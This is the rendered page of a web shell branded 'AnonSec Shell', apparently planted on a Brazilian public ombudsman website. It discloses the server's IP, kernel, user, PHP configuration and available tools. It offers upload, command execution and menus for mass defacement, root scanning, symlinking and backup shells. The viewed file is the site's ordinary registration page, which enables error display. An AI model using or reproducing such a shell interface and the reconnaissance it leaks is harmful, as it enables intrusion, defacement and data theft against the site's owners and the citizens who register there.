AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ouvidoria/obidos/cadastro/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/ouvidoria/obidos/cadastro/index.php
<?php
    require_once("manutencao.php");
    require_once("../inc/topo.php");
    ini_set('display_errors', 'on');
?>

    <div class="container-fluid">
        <div class="panel panel-info">
            <div class="panel-heading">
                <div class="panel-title">
                    <span style="font-size:20px;">&nbsp;Cadastro do usuário</span>
                </div>
            </div>
        </div>
    </div>
<?php if (!empty($_GET['r'])) { ?>
    <div class="container-fluid">
        <div class="panel panel-success">
            <div class="panel-heading">
                <div class="panel-title">
                    <b>Cadastro Realizado com sucesso!</b> <br><br>
                    Cique <a href="../index.php"><strong>aqui</strong></a> para acessar o sistema e efetuar sua solicitação.<br><br>
                    Utilize seu <b>CPF</b> e a <b>senha</b> criada para ter acesso ao sistema<br><br>
                    <strong style="color: darkred;">Acesse o sistema regularmente para verificar as respostas a sua solicitação</strong><br>
                </div>
            </div>
        </div>
    </div>
<?php } else { ?>
    <form action="<?php echo URL_BASE_SISTEMA; ?>cadastro/index.php" id="formulario" method="post">
        <?php include_once("../cadastro/formulario.php"); ?>
    </form>
    <?php
    getErro($erro);
}
    include("../inc/rodape.php");
?>

Anon7 - 2022
AnonSec Team